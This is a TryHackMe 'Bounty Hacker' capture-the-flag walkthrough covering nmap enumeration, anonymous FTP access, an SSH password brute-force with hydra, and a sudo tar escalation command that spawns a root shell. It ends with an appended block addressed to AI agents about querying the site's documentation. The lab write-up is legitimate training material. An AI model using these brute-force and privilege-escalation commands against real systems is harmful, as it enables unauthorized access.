# Bounty Hacker ## [Bounty Hacker](https://www.tryhackme.com/room/cowboyhacker) ## Enumeration > nmap -sCV -O -v ``` PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.4.11.0 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). ``` ## Exploit / User port 21: ftp 10.10.225.190 trying to login with default credentials: > user : anonymous password : it works ![](https://user-images.githubusercontent.com/53917092/99078566-5a4cae00-259d-11eb-9ec9-84bbd5ddb14b.png) so we download the files locks.txt and task.txt ![](https://user-images.githubusercontent.com/53917092/99078658-85370200-259d-11eb-83a5-1968bfe1ef81.png) ![](https://user-images.githubusercontent.com/53917092/99078717-997aff00-259d-11eb-97cf-92437bf3b326.png) locks: ``` rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ReddRA60N R3dDrag0nSynd1c4te dRa6oN5YNDiCATE ReDDR4g0n5ynDIc4te R3Dr4gOn2044 RedDr4gonSynd1cat3 R3dDRaG0Nsynd1c@T3 Synd1c4teDr@g0n reddRAg0N REddRaG0N5yNdIc47e Dra6oN$yndIC@t3 4L1mi6H71StHeB357 rEDdragOn$ynd1c473 DrAgoN5ynD1cATE ReDdrag0n$ynd1cate Dr@gOn$yND1C4Te RedDr@gonSyn9ic47e REd$yNdIc47e dr@goN5YNd1c@73 rEDdrAGOnSyNDiCat3 r3ddr@g0N ReDSynd1ca7e ``` (this looks like a password list file) task: ``` 1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin ``` (now we know the system have a user named "lin") using hydra to brute-force ssh with user "lin" and the passwords from locks.txt > hydra -l lin -P locks.txt ssh://10.10.225.190 -F and we got the password using these credentials we can log in in ssh logging into ssh we have the user.txt ## Root > sudo -l ``` User lin may run the following commands on bountyhacker: (root) /bin/tar ``` checking GTFobins : ![image](https://user-images.githubusercontent.com/53917092/99079348-97fe0680-259e-11eb-8d8e-ef1d4a8ddadf.png) we got the command: > sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh and we are root :) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.verni.lol/try-hack-me-write-ups/bounty-hacker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.